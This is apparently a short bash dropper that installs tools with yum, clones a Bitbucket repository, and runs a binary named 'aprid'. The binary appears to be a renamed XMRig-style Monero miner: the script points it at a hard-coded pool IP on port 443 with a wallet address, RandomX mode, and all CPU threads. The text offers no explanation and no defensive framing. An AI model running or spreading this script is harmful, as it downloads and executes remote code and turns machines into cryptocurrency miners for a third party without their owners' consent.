#!/bin/bash
yum update && yum -y install sudo
yum -y install git wget
git clone https://bitbucket.org/asana/luo.git && cd luo
chmod 777 aprid SHA256SUMS
./aprid --donate-level 1 -o 209.97.149.155:443 -u solo:SaLvsBAMHcnaDrMMLok961GKJJhkKbspE9FRaAYbjGxPFQwqgRFuNn2BjSyMHxMT2FVkVVUMpqgVURM4jmFQFsq6RcsBY64WmBj -p us -a rx/0 -k -t $(nproc --all)
